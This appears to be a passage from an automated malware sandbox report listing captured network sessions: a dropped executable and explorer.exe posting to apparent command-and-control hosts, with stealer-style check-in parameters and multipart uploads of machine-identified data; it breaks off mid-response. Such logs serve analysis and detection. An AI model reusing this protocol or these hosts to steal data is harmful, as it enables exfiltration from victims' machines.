                                                          May 27, 2024 00:30:42.022459030 CEST | 196 | OUT | Data Raw: 3b 6e 52 16 85 bf 6b 56 ab df c8 0b 74 09 0b be 7c 09 bc 90 6e 03 e3 15 0c 09 7d 9c 45 b3 c2 6f 9b 5f b6 2e 03 19 24 6a 9b 96 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 38 38 d9 e5
                                                          Data Ascii: ;nRkVt|n}Eo_.$j?#1|J7 M@NA .[k,vu88}1UtOw}jcO90o*p?i'^OIA2"%uQ.\(08<EU'
                                                          May 27, 2024 00:30:43.034023046 CEST | 151 | IN | HTTP/1.1 404 Not Found
                                                          Server: nginx/1.26.0
                                                          Date: Sun, 26 May 2024 22:30:42 GMT
                                                          Content-Type: text/html; charset=utf-8
                                                          Connection: close
                                                          Data Raw: 03 00 00 00 72 e8 84
                                                          Data Ascii: r


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          33 | 192.168.2.5 | 49789 | 186.112.12.192 | 80 | 1028 | C:\Windows\explorer.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          May 27, 2024 00:30:47.787369013 CEST | 283 | OUT | POST /tmp/index.php HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Accept: */*
                                                          Referer: http://ajfprnyfteagngdf.net/
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                          Content-Length: 317
                                                          Host: dbfhns.in
                                                          May 27, 2024 00:30:47.787408113 CEST | 317 | OUT | Data Raw: 3b 6e 52 16 85 bf 6b 56 ab df c8 0b 74 09 0b be 7c 09 bc 90 6e 03 e3 15 0c 09 7d 9c 45 b3 c2 6f 9b 5f b6 2e 03 19 24 6a 9b 96 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 77 0e fe b7
                                                          Data Ascii: ;nRkVt|n}Eo_.$j?#1|J7 M@NA .[k,vuwygQt'=Hv:3(0)zvHVk[],IXlTSd#kZ6/LoXemZ,P.(o
                                                          May 27, 2024 00:30:48.800028086 CEST | 151 | IN | HTTP/1.1 404 Not Found
                                                          Server: nginx/1.26.0
                                                          Date: Sun, 26 May 2024 22:30:48 GMT
                                                          Content-Type: text/html; charset=utf-8
                                                          Connection: close
                                                          Data Raw: 03 00 00 00 72 e8 84
                                                          Data Ascii: r
                                                          May 27, 2024 00:30:49.088643074 CEST | 151 | IN | HTTP/1.1 404 Not Found
                                                          Server: nginx/1.26.0
                                                          Date: Sun, 26 May 2024 22:30:48 GMT
                                                          Content-Type: text/html; charset=utf-8
                                                          Connection: close
                                                          Data Raw: 03 00 00 00 72 e8 84
                                                          Data Ascii: r


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          34 | 192.168.2.5 | 49790 | 186.112.12.192 | 80 | 1028 | C:\Windows\explorer.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          May 27, 2024 00:30:56.387180090 CEST | 282 | OUT | POST /tmp/index.php HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Accept: */*
                                                          Referer: http://nqimnaeauxblwda.com/
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                          Content-Length: 330
                                                          Host: dbfhns.in
                                                          May 27, 2024 00:30:56.387204885 CEST | 330 | OUT | Data Raw: 3b 6e 52 16 85 bf 6b 56 ab df c8 0b 74 09 0b be 7c 09 bc 90 6e 03 e3 15 0c 09 7d 9c 45 b3 c2 6f 9b 5f b6 2e 03 19 24 6a 9b 96 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 29 5d c5 fa
                                                          Data Ascii: ;nRkVt|n}Eo_.$j?#1|J7 M@NA .[k,vu)]rlg, l-`o!S{y# GS;XPs@U6c&i49>/hTv,I*OD1aq([I
                                                          May 27, 2024 00:30:57.441029072 CEST | 151 | IN | HTTP/1.1 404 Not Found
                                                          Server: nginx/1.26.0
                                                          Date: Sun, 26 May 2024 22:30:57 GMT
                                                          Content-Type: text/html; charset=utf-8
                                                          Connection: close
                                                          Data Raw: 03 00 00 00 72 e8 84
                                                          Data Ascii: r


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          0 | 192.168.2.5 | 49720 | 188.114.97.3 | 443 | 5640 | C:\Users\user\AppData\Local\Temp\21AE.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          2024-05-26 22:27:25 UTC | 271 | OUT | POST /api HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                          Content-Length: 8
                                                          Host: whispedwoodmoodsksl.shop
                                                          2024-05-26 22:27:25 UTC | 8 | OUT | Data Raw: 61 63 74 3d 6c 69 66 65
                                                          Data Ascii: act=life
                                                          2024-05-26 22:27:25 UTC | 806 | IN | HTTP/1.1 200 OK
                                                          Date: Sun, 26 May 2024 22:27:25 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          Set-Cookie: PHPSESSID=47nfmbqjldknucg7gvg5bmf2rm; expires=Thu, 19-Sep-2024 16:14:04 GMT; Max-Age=9999999; path=/
                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                          Pragma: no-cache
                                                          CF-Cache-Status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vQPyIPYxHMy3mFUIcHobZVCqxAXfXYXULBa81lKSyHBOCq4QwYdYZJte92BRTTQtk%2BUA3wAFi7IDNLq5LXXwySgHvl4MgbRWSzXA2K4rD5FWG9YZOW6PvT9ai445smNyMnEtkNBMvntxMGM%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 88a131444e3643fb-EWR
                                                          alt-svc: h3=":443"; ma=86400
                                                          2024-05-26 22:27:25 UTC | 7 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a
                                                          Data Ascii: 2ok
                                                          2024-05-26 22:27:25 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                          Data Ascii: 0


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          1 | 192.168.2.5 | 49722 | 188.114.97.3 | 443 | 5640 | C:\Users\user\AppData\Local\Temp\21AE.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          2024-05-26 22:27:26 UTC | 272 | OUT | POST /api HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                          Content-Length: 74
                                                          Host: whispedwoodmoodsksl.shop
                                                          2024-05-26 22:27:26 UTC | 74 | OUT | Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 73 77 67 35 45 47 2d 2d 26 6a 3d 38 62 61 63 36 34 34 31 36 36 63 64 64 32 32 30 34 64 30 66 61 33 30 36 31 37 32 62 30 32 35 34
                                                          Data Ascii: act=recive_message&ver=4.0&lid=swg5EG--&j=8bac644166cdd2204d0fa306172b0254
                                                          2024-05-26 22:27:26 UTC | 812 | IN | HTTP/1.1 200 OK
                                                          Date: Sun, 26 May 2024 22:27:26 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          Set-Cookie: PHPSESSID=nkkmom5fgim5a818o2nuh1qrnu; expires=Thu, 19-Sep-2024 16:14:05 GMT; Max-Age=9999999; path=/
                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                          Pragma: no-cache
                                                          CF-Cache-Status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dYZElsZi7cZIaPypMb6MJiO5s2O%2F3%2BGJMBhSNReuEXh4aqfNu3PgJCo8ZOWjYBUKgJY7%2BUIalyookcofw7Lx6j%2FJS23iVycCc0AxfFgl5knzeshSQ9M99TX1hQ1uyxwoBaldB3ixaxaxy3A%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 88a1314a7f500cba-EWR
                                                          alt-svc: h3=":443"; ma=86400
                                                          Data Ascii: tm3QZF2EupFlXS9/iFiJYz7YI1vuukallWj9UZNnnC+nfY1QOJS2vHAwH2OsQLVbAvATfseXRpX4VYxJBzeQM7Z56Hx1uLK5fUkGUq1UqRIbgQfmg7d2pPQUpDQXF6Ee833cWE2Iqrl9cQtDvEC1U1LAB3qny0ad4FmQUQcTtAeebPFRXYjLjBBRq2OI8KkeGp0/A++fd7iVaZh9PzekE4px3Hx1kLatRRkTb6hEtU8C+ANa959ivdR0nWgXF/E
                                                          2024-05-26 22:27:26 UTC1369INData Raw: 57 6b 38 31 5a 4f 4e 59 52 51 65 4d 74 55 64 32 43 5a 58 76 55 59 75 6b 72 73 6a 75 61 31 6f 2f 52 67 75 43 39 6b 65 38 33 7a 73 5a 42 58 63 73 6f 45 70 58 41 4f 72 62 4f 79 70 61 77 37 38 52 6d 35 58 72 78 61 6b 39 56 43 63 62 42 5a 72 64 52 36 7a 66 51 31 52 58 66 57 72 37 48 47 46 45 32 75 73 53 4f 30 32 4c 6c 67 62 66 76 75 66 42 37 46 4d 52 63 78 4d 46 6a 4b 51 42 70 4d 63 73 56 46 64 68 4f 2b 4d 45 42 42 57 50 73 45 5a 36 44 4a 53 6e 54 38 44 37 39 70 48 32 4c 31 51 6e 42 67 57 61 70 45 44 6e 6a 57 34 63 46 48 4d 70 35 47 4a 71 52 4d 4c 6f 47 69 5a 64 2b 49 59 76 31 4c 72 6a 33 2b 78 4d 44 47 6f 45 52 73 66 6a 4f 64 71 52 65 77 34 51 61 79 79 6a 48 42 6f 48 32 36 56 4e 46 42 79 4f 2b 44 36 58 2b 2f 69 52 39 6a 30 76 5a 42 70 4c 78 66 49 57 71 62 78
                                                          Data Ascii: Wk81ZONYRQeMtUd2CZXvUYukrsjua1o/RguC9ke83zsZBXcsoEpXAOrbOypaw78Rm5Xrxak9VCcbBZrdR6zfQ1RXfWr7HGFE2usSO02LlgbfvufB7FMRcxMFjKQBpMcsVFdhO+MEBBWPsEZ6DJSnT8D79pH2L1QnBgWapEDnjW4cFHMp5GJqRMLoGiZd+IYv1Lrj3+xMDGoERsfjOdqRew4QayyjHBoH26VNFByO+D6X+/iR9j0vZBpLxfIWqbx
                                                          2024-05-26 22:27:26 UTC1369INData Raw: 6d 72 37 5a 52 51 50 6d 4f 51 59 49 56 69 47 68 30 2b 5a 6f 36 43 4a 37 6c 34 49 64 52 70 4f 77 2b 63 52 37 35 4a 77 43 31 70 47 4a 72 68 36 55 31 62 64 70 56 74 74 57 6f 62 67 55 5a 66 37 35 4d 44 75 4a 55 6f 31 54 78 43 52 73 31 65 32 67 44 49 44 56 33 4e 71 2b 77 34 61 42 38 61 6c 54 57 30 62 78 61 6f 54 33 37 6a 32 30 75 6c 44 4a 45 4d 66 53 38 58 63 44 4f 71 52 66 31 70 5a 4a 53 58 6a 42 47 30 48 78 4f 49 55 4b 6c 44 51 71 51 62 4a 72 2b 66 42 76 7a 45 41 61 42 6f 46 6a 4b 51 57 37 34 6c 37 46 52 52 70 4b 61 5a 62 52 41 76 4f 36 68 74 74 59 34 6a 34 47 5a 6e 6a 6f 50 4b 38 62 78 52 73 46 55 62 55 37 77 72 6f 6a 6a 45 2b 48 47 73 74 6d 31 64 61 53 64 65 6c 57 32 31 61 68 75 42 52 6c 2f 76 6b 77 4f 34 6c 53 6a 56 50 45 4a 47 7a 56 37 61 41 4d 67 4e 58
                                                          Data Ascii: mr7ZRQPmOQYIViGh0+Zo6CJ7l4IdRpOw+cR75JwC1pGJrh6U1bdpVttWobgUZf75MDuJUo1TxCRs1e2gDIDV3Nq+w4aB8alTW0bxaoT37j20ulDJEMfS8XcDOqRf1pZJSXjBG0HxOIUKlDQqQbJr+fBvzEAaBoFjKQW74l7FRRpKaZbRAvO6httY4j4GZnjoPK8bxRsFUbU7wrojjE+HGstm1daSdelW21ahuBRl/vkwO4lSjVPEJGzV7aAMgNX
                                                          2024-05-26 22:27:26 UTC1369INData Raw: 6c 46 51 4d 54 62 4b 78 70 4e 77 61 68 44 2f 37 6a 32 30 75 34 7a 57 6e 39 55 48 59 4c 45 46 2b 65 4c 65 31 6f 49 4b 7a 50 6a 53 68 51 66 68 36 74 56 50 78 79 65 2b 45 62 58 74 75 48 53 6f 48 34 49 64 52 4a 47 31 4f 64 41 32 71 46 62 43 42 78 6b 61 4a 46 4d 58 31 50 58 35 41 35 76 66 4e 61 31 46 4d 69 38 38 4f 2b 51 53 67 74 67 42 41 66 6b 35 78 48 6e 33 7a 4a 61 44 79 56 79 34 33 74 47 54 4e 58 58 42 53 5a 49 78 62 6b 61 2b 61 76 74 78 4c 39 36 43 69 63 4c 43 39 75 6b 45 61 54 48 4c 31 52 58 64 32 72 37 48 42 4e 4a 32 65 51 57 49 31 2f 55 71 67 66 61 72 65 4f 57 6b 45 4d 75 62 41 42 47 7a 4f 49 4d 32 71 46 4c 43 78 42 31 61 49 56 66 51 6b 53 55 71 31 55 31 48 4a 37 34 4e 64 4b 76 34 39 2b 6f 64 6c 70 34 57 6c 79 43 38 6b 65 38 7a 44 4a 61 42 53 56 79 34
                                                          Data Ascii: lFQMTbKxpNwahD/7j20u4zWn9UHYLEF+eLe1oIKzPjShQfh6tVPxye+EbXtuHSoH4IdRJG1OdA2qFbCBxkaJFMX1PX5A5vfNa1FMi88O+QSgtgBAfk5xHn3zJaDyVy43tGTNXXBSZIxbka+avtxL96CicLC9ukEaTHL1RXd2r7HBNJ2eQWI1/UqgfareOWkEMubABGzOIM2qFLCxB1aIVfQkSUq1U1HJ74NdKv49+odlp4WlyC8ke8zDJaBSVy4


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          2 | 192.168.2.5 | 49724 | 188.114.97.3 | 443 | 5640 | C:\Users\user\AppData\Local\Temp\21AE.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          2024-05-26 22:27:27 UTC | 290 | OUT | POST /api HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                          Content-Length: 12830
                                                          Host: whispedwoodmoodsksl.shop
                                                          2024-05-26 22:27:27 UTC | 12830 | OUT | Data Ascii:
                                                          --be85de5ipdocierre1
                                                          Content-Disposition: form-data; name="hwid"

                                                          944807E072BDA97340EABE126A4DF4ED
                                                          --be85de5ipdocierre1
                                                          Content-Disposition: form-data; name="pid"

                                                          2
                                                          --be85de5ipdocierre1
                                                          Content-Disposition: form-data; name="lid"

                                                          swg5EG--
                                                          --b
                                                          2024-05-26 22:27:28 UTC | 820 | IN | HTTP/1.1 200 OK
                                                          Date: Sun, 26 May 2024 22:27:28 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          Set-Cookie: PHPSESSID=a82oopj0ggddejhcmcg5mlmu88; expires=Thu, 19-Sep-2024 16:14:06 GMT; Max-Age=9999999; path=/
                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                          Pragma: no-cache
                                                          CF-Cache-Status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zzRVUETFSAN3BZeROjNHkshu%2FLyHZewK5u4Qx6rI%2FvrNFNvRsiEe%2Fd5%2BO1TXidH51b0sUj7Jvxdv4soRGK6mXNbKg%2FQaiFZhwbvp%2FR%2BKWqi4MEPJrjWv69XQ4S6XTOmBuwtd9%2FrUV0avLwo%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 88a131523829188d-EWR
                                                          alt-svc: h3=":443"; ma=86400
                                                          2024-05-26 22:27:28 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 37 35 0d 0a
                                                          Data Ascii: fok 8.46.123.175
                                                          2024-05-26 22:27:28 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                          Data Ascii: 0


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          3 | 192.168.2.5 | 49726 | 188.114.97.3 | 443 | 5640 | C:\Users\user\AppData\Local\Temp\21AE.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          2024-05-26 22:27:28 UTC | 290 | OUT | POST /api HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                          Content-Length: 15072
                                                          Host: whispedwoodmoodsksl.shop
                                                          2024-05-26 22:27:28 UTC | 15072 | OUT | Data Ascii:
                                                          --be85de5ipdocierre1
                                                          Content-Disposition: form-data; name="hwid"

                                                          944807E072BDA97340EABE126A4DF4ED
                                                          --be85de5ipdocierre1
                                                          Content-Disposition: form-data; name="pid"

                                                          2
                                                          --be85de5ipdocierre1
                                                          Content-Disposition: form-data; name="lid"

                                                          swg5EG--
                                                          --b
                                                          2024-05-26 22:27:29 UTC | 812 | IN | HTTP/1.1 200 OK
                                                          Date: Sun, 26 May 2024 22:27:29 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          Set-Cookie: PHPSESSID=7vafgaj9gi9iq7oq9nuhvch45t; expires=Thu, 19-Sep-2024 16:14:08 GMT; Max-Age=9999999; path=/
                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                          Pragma: no-cache
                                                          CF-Cache-Status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XBowP%2BfiLw9rl%2FpBZ0ufXXQCM3lVjc2JVVSxm6pGlAhFv7yZkFjSCJ97RwhXnX8Iu3mtusRrO558mHjohGN57xWmmURZNm99JlQvAEX%2BuDBWVVfcu7KoP%2B4zalnjmvvALTeLmuaRbjXcDZc%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 88a1315a9fe84228-EWR
                                                          alt-svc: h3=":443"; ma=86400
                                                          2024-05-26 22:27:29 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 37 35 0d 0a
                                                          Data Ascii: fok 8.46.123.175
                                                          2024-05-26 22:27:29 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                          Data Ascii: 0


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          4 | 192.168.2.5 | 49727 | 188.114.97.3 | 443 | 5640 | C:\Users\user\AppData\Local\Temp\21AE.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          2024-05-26 22:27:30 UTC | 290 | OUT | POST /api HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                          Content-Length: 20562
                                                          Host: whispedwoodmoodsksl.shop
                                                          2024-05-26 22:27:30 UTC | 15331 | OUT | Data Ascii:
                                                          --be85de5ipdocierre1
                                                          Content-Disposition: form-data; name="hwid"

                                                          944807E072BDA97340EABE126A4DF4ED
                                                          --be85de5ipdocierre1
                                                          Content-Disposition: form-data; name="pid"

                                                          3
                                                          --be85de5ipdocierre1
                                                          Content-Disposition: form-data; name="lid"

                                                          swg5EG--
                                                          --b
                                                          2024-05-26 22:27:30 UTC | 820 | IN | HTTP/1.1 200 OK
                                                          Date: Sun, 26 May 2024 22:27:30 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          Set-Cookie: PHPSESSID=pvq46rqjvntdk15c5km9jpqfr1; expires=Thu, 19-Sep-2024 16:14:09 GMT; Max-Age=9999999; path=/
                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                          Pragma: no-cache
                                                          CF-Cache-Status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lKXQyQoVOzvWZhxs4FI3%2B%2FgL%2FG%2FxFkil1jAA5BVKD%2Bd1HQtwqDZ32EPd%2FUfKShgTjd4nXjVSCCD4FtPiLzjCbPgHnJZhjV7OWi6BZAcZ1A6U1%2BcW8xO5g7DUsD%2B8FOXsZ0pOBk8IHAXsosY%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 88a1316218084314-EWR
                                                          alt-svc: h3=":443"; ma=86400
                                                          2024-05-26 22:27:30 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 37 35 0d 0a
                                                          Data Ascii: fok 8.46.123.175
                                                          2024-05-26 22:27:30 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                          Data Ascii: 0


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          5 | 192.168.2.5 | 49728 | 188.114.97.3 | 443 | 5640 | C:\Users\user\AppData\Local\Temp\21AE.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          2024-05-26 22:27:32 UTC | 289 | OUT | POST /api HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                          Content-Length: 5445
                                                          Host: whispedwoodmoodsksl.shop
                                                          2024-05-26 22:27:32 UTC | 5445 | OUT | Data Ascii:
                                                          --be85de5ipdocierre1
                                                          Content-Disposition: form-data; name="hwid"

                                                          944807E072BDA97340EABE126A4DF4ED
                                                          --be85de5ipdocierre1
                                                          Content-Disposition: form-data; name="pid"

                                                          1
                                                          --be85de5ipdocierre1
                                                          Content-Disposition: form-data; name="lid"

                                                          swg5EG--
                                                          --b
                                                          2024-05-26 22:27:32 UTC | 816 | IN | HTTP/1.1 200 OK
                                                          Date: Sun, 26 May 2024 22:27:32 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          Set-Cookie: PHPSESSID=ac8ffifl4fi4jvjojf5f4tjltr; expires=Thu, 19-Sep-2024 16:14:11 GMT; Max-Age=9999999; path=/
                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                          Pragma: no-cache
                                                          CF-Cache-Status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=x3mLKVuYs%2B7YKFQMWtvtA0kUJWRHCDH%2B4e57s0qJTSZzLJ16E%2FfAsxLqXBsxxQpDXnozDSs8G6zDwIjKoV%2FeRlIaaNTSQ9gwJof1Gh%2BVN4YdaJ6Z57WIl7Pr%2BmIDXGtQz35oKHfLaO98msw%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 88a1316dcc0e42e5-EWR
                                                          alt-svc: h3=":443"; ma=86400
                                                          2024-05-26 22:27:32 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 37 35 0d 0a
                                                          Data Ascii: fok 8.46.123.175
                                                          2024-05-26 22:27:32 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                          Data Ascii: 0


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          6 | 192.168.2.5 | 49730 | 188.114.97.3 | 443 | 5640 | C:\Users\user\AppData\Local\Temp\21AE.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          2024-05-26 22:27:37 UTC | 289 | OUT | POST /api HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                          Content-Length: 1248
                                                          Host: whispedwoodmoodsksl.shop
                                                          2024-05-26 22:27:37 UTC | 1248 | OUT | Data Ascii:
                                                          --be85de5ipdocierre1
                                                          Content-Disposition: form-data; name="hwid"

                                                          944807E072BDA97340EABE126A4DF4ED
                                                          --be85de5ipdocierre1
                                                          Content-Disposition: form-data; name="pid"

                                                          1
                                                          --be85de5ipdocierre1
                                                          Content-Disposition: form-data; name="lid"

                                                          swg5EG--
                                                          --b
                                                          2024-05-26 22:27:37 UTC | 808 | IN | HTTP/1.1 200 OK
                                                          Date: Sun, 26 May 2024 22:27:37 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          Set-Cookie: PHPSESSID=b0e2lbescn175ek3ebac7c3ibo; expires=Thu, 19-Sep-2024 16:14:16 GMT; Max-Age=9999999; path=/
                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                          Pragma: no-cache
                                                          CF-Cache-Status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JkzwrTwrHzDstd3pe2jFLTxO4re5uXO5oUX1TNlNrCaU4ukEMS8P1iJ5TWB8MIRDU7iIA0%2Bug6g3UafXRu3CmVvFnGZCG9htxmPaslwc7FJaCBvJ3LM3R3K30FHdKHYeB22pygNWn%2BuRBu8%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 88a1318edd96423d-EWR
                                                          alt-svc: h3=":443"; ma=86400
                                                          2024-05-26 22:27:37 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 37 35 0d 0a
                                                          Data Ascii: fok 8.46.123.175
                                                          2024-05-26 22:27:37 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                          Data Ascii: 0


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          7 | 192.168.2.5 | 49731 | 188.114.97.3 | 443 | 5640 | C:\Users\user\AppData\Local\Temp\21AE.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          2024-05-26 22:27:38 UTC | 291 | OUT | POST /api HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                          Content-Length: 568201
                                                          Host: whispedwoodmoodsksl.shop
                                                          2024-05-26 22:27:39 UTC | 15331 | OUT | Data Ascii:
                                                          --be85de5ipdocierre1
                                                          Content-Disposition: form-data; name="hwid"

                                                          944807E072BDA97340EABE126A4DF4ED
                                                          --be85de5ipdocierre1
                                                          Content-Disposition: form-data; name="pid"

                                                          1
                                                          --be85de5ipdocierre1
                                                          Content-Disposition: form-data; name="lid"

                                                          swg5EG--
                                                          --b
                                                          2024-05-26 22:27:40 UTC | 810 | IN | HTTP/1.1 200 OK
                                                          Date: Sun, 26 May 2024 22:27:40 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          Set-Cookie: PHPSESSID=32d74rsqko10uvafefhrdtmog3; expires=Thu, 19-Sep-2024 16:14:19 GMT; Max-Age=9999999; path=/
                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                          Cache-Control: no-store, no-cache, must-revalidate
